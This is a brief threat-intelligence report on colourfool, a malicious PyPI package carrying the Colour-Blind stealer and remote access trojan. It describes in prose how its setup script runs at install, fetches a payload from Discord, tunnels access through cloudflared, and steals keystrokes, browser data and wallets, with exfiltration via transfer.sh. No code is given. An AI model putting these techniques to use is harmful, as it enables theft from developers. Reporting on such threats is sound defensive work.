A fully-featured information stealer and remote access trojan has been discovered embedded into a malicious Python package uploaded to the Python Package Index, or PyPI. PyPI is the official repository of Python packages that has been increasingly used by threat actors to host and distribute malware.
The package, named colourfool, contains the information stealing malware, which has been dubbed Colour-Blind due to the package name. Like other malicious Python modules that have been seen on PyPI, Colour-Blind conceals its malicious code in the setup script, which is executed whenever the package is installed via the pip command. When executed, the setup script downloads a ZIP file from a hard-coded Discord URL contained with the script, unzips it, and executes the main payload. The malware starts a Flask web application on the infected system, allowing the threat actors to access it via Cloudflare’s reverse tunnel utility “cloudflared” regardless of any inbound firewall rules. This web application contains different modules to interact with the infected system, including the ability to disable security software, log keystrokes, and steal web browser and cryptocurrency wallet information. Persistence for the script is established via a Visual Basic script placed into the user’s Start Up folder, and data exfiltration is achieved by using transfer.sh, an anonymous file transfer website becoming increasingly popular among threat actors.
This campaign coincides with another campaign using PyPI to distribute malware, where thousands of fake packages were uploaded to the repository in an attempt to deploy a Rust-based information stealer.